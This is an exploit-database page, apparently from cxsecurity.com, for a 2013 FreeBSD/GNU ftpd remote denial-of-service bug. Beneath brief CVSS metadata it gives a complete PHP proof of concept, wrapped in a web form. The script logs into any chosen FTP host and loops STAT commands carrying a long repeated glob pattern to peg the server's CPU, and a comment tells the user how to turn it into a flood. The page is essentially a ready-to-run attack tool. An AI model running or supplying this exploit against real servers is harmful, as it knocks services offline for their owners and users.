FreeBSD/GNU ftpd remote denial of service exploit

2013-01-31 / 2013-02-01
Credit: DevilTeam
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<?php //PoC by Kacper R. from devilteam.pl //Bug found by: Maksymilian ( cxsec.org ) set_time_limit(0); if(isset($_GET['runit'])){ flush(); while(1){ $fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5); fread($fp,1024); fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024); fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024); fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n"); fclose($fp); time_nanosleep(0,300000000);//delete to flood flush(); } } if(!isset($_GET['host'])) $_GET['host']='localhost'; if(!isset($_GET['port'])) $_GET['port']='21'; if(!isset($_GET['user'])) $_GET['user']='anonymous'; if(!isset($_GET['pass'])) $_GET['pass']='anonymous'; echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of Service</title></head><body> <h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action="" method="GET"> <PRE> Host: <input type="text" name="host" value="'.$_GET['host'].'"> Port: <input type="text" name="port" value="'.$_GET['port'].'"> User: <input type="text" name="user" value="'.$_GET['user'].'"> Pass: <input type="text" name="pass" value="'.$_GET['pass'].'"> </PRE> </p>'; if(isset($_GET['confirm'])){ echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop" name="runit">'; echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt2.gif"></a><a href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png" width="100" hight="40"></a>'; } else{ echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">'; echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/" ><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100" hight="40"></a>'; } echo ' </form> </body> </html>'; ?>

References:

https://devilteam.pl
http://cxsecurity.com/issue/WLB-2013020003


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top